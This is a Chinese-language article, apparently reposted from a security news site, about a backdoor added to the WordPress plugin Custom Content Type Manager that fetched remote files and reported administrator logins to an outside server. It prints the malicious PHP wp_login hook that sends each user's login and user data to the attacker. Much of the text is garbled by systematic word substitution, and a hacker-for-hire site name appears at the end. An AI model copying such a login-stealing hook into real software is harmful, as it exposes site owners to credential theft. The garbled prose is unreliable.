据悉， Sucuri安全团队研讨人员近来指出WordPress一款插件（自界说内容办理）CCTM存在后门。经过该后门，能够对WordPress上的中心文件进行篡改，以此记载并盗取感染站点办理员用户的登录账号及暗码。
Freebuf 百科
自界说内容办理（ Custom Content Type Manager）插件的功用
自界说内容类型办理（CCTM）答应用户创立自界说内容类型（也称为文章类型），也能够对每个下拉菜单、复选框和图画甚至于其他米素，供给标准化的自界说区域，这赋予了WordPress内容办理的功用。这个插件还答应导出和导入用户的内容界说，使得它易于在多个站点之间确保相似的结构。
假设想为博客增加一个独自的部分来宣布电影谈论。经过运用自界说文章类型，你能够创立一种新的文章类型，就像文章（posts）和页面（pages）相同，它能够包含一组不同的数据。比方新的办理菜单、专门的修改页面、自界说分类 和 更多有用的发布办理功用。自界说文字类型 具有新的文章办理选项，就像默许的文章类型（文章、页面、附件 ）相同。一种 自界说文章类型 能够存储各式各样的信息。它有专门的修改器、多媒体上传 并运用WordPress现有的表结构，便于数据办理。
后门的发现
此事情是由Sucuri安全团队（一个专门供给web安全服务的团队）初次进行追寻剖析的。据Sucuri安全研讨人员说到，
一开始他们是在其客户处发现一个命名古怪的文件 (auto-update.php)，而起先并没发现有可疑行为，直到该插件进行更新的时分。
Sucuri安全团队说到当他们在为客户铲除一个感染站点时，发现了一个可疑的文件auto-update.php，该文件是被存放在wp－content/plugins/custom-content-type-manager/.的途径下。详细如下图，

 
据研讨剖析，该后门程序，能从一个地址为http://wordpresscore .com/plugins/cctm/update/ 的服务端下载文件，并将它们保存为.php格局存放在插件装备目录下。
该插件既是上述说到的 Custom Content Type Manager (CCTM)，在曩昔三年里该插件首要用于创立自界说文章类型，现在现已积累了必定的用户数量，据初步统计现在现已在超越10,000个站点上装置了该插件。
插件疑云，奥秘的办理者
从 Sucuri安全团队两个星期的查询来看，该插件在曩昔的10个月将近一年看起来像一个被抛弃的项目，并无任何更新，但是近期奥秘地更换了办理者。而该名名为wooranker的新开发者随后更新了插件，发布了一个新的版别。
咱们在官方插件目录中找到的每一个WordPress插件，都是经过子版别存储库进行晋级的。在问题盯梢体系的协助下，任何人都能够运用该存储库去搜索相应的信息（包含像方针，时刻以及改变事项等）在恣意插件的恣意版别中。比方，下图为近期CCTM更改的状况，

咱们能够从上面截图看到，其间的一次更改是于2019年2月18日增加了auto-update.php文件。在此次更新中，“wooranker”改动并增加了下面的描述信息，
“新办理者的小改动”（保存原始语法）
实际上，从上述截图中咱们能够看到，两个星期前该插件依然由fireproofsocks在保持更新，但之后其间的一项变化的描述为“将wooranker增添到readme中”，再到后边就变成wooranker在对该插件进行更新了。
或许该插件开发者现已对其失掉爱好，又或许受雇于wooranker。另一方面，由于实际上fireproofsocks现已将近一年没对该插件进行更新了，咱们也估测是否 wooranke侵略了fireproofsocks的账户，随后增添了本身作为新的办理者。
此外，在2019年2月5日，wooranker也一起加入到 Postie插件项目中。而其在Postie插件项目的变化都为合法可查的，而且都由Postie插件的初始发起人赞同。这一切看起来却有点令人摸不清脑筋。那么接下来让咱们来看看更新的歹意CCTM插件及wooranker 怎么运用它侵略站点的。
自界说内容办理（CCTM）插件 0.9.8.8 版别存在歹意代码
而该名开发者关于更新的版别赋予了其新的“使命”。首要，新的版别如上述所看到的，增加了auto-update.php的文件，而据研讨剖析，该文件可从长途的服务器下载指定文件到受感染的站点。
经过Trac咱们也看到了（于2月19日最终更新）。它增加了/includes/CCTM_Communicator.php文件（该文件会与auto-update.php联合运转，其首要的使命为ping wooranker的服务器端然后使得服务器能记载新感染的站点IP地址等信息。）以及将下述的代码段刺进到插件的index.php文件中。
// Send plugin information when user loginfunction _wp_login_eventhandler($user_login, $user) {require_once('includes/CCTM_Communicator.php');$_objCCTMCom = new CCTM_Communicator();$_objCCTMCom->addInfo(array($user_login, $user));$_objCCTMCom->send_info();}add_action('wp_login', '_wp_login_eventhandler', 10, 2);
详细更改如下图，

 
该段代码作用为每逢用户登录到WordPress站点时，将站点及用户的信息发送到wooranker的服务器(wordpresscore .com）上。
进犯途径重演
经过在受感染的站点上拜访登陆，完成对进犯的回溯。
于2月28日，从源地址104.131.27.120发起了测验运用Python脚本 (“python-requests/2.2.1 CPython/2.7.6 Linux/3.13.0-79-generic“)登录到WordPress。该站点的地址明显地经过新的CCTM_Communicator功用来获取的。
依据对受感染站点的监测，某次 wooranker妄图登陆到一个受感染的站点，但由于站点办理员更改了登陆的URL，所以 wooranker未能成功侵略站点。随后看到测验登陆受阻，wooranker也随即更改了战略。其使用auto-update.php后门，强制方针站点下载并装置别的一个名为c.php的文件，该文件首要用于创立另一名为wp-options.php的文件。后者首要用于篡改WordPress的中心文件。据研讨发现，遭受篡改的首要有三个文件，

[1] [2]  黑客接单网